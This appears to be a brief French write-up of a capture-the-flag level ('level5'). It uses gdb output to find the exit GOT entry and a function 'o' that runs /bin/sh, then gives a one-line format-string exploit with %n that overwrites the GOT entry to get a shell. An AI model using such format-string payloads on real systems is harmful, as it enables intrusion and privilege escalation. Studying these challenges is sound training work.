dans ce niveau on va utiliser la meme faille de securite que pour les exercice precedent et changer l'appel de la fonction exit par l'appel a la fonction o

End of assembler dump.
(gdb) x/i 0x80483d0
   0x80483d0 <exit@plt>:	jmp    *0x8049838
(gdb) x 0x8049838
   0x8049838 <exit@got.plt>:	(bad)


addresse modifiable de la fonction exit : 0x08049838

0x80484a4 <o>:	0x83e58955
(gdb)

addresse de la fonction o faisant un appel system a /bin/sh : 0x080484a4


cat <(python -c 'print("\x38\x98\x04\x08" + "%134513824x" + "%4$n")') - | ./level5
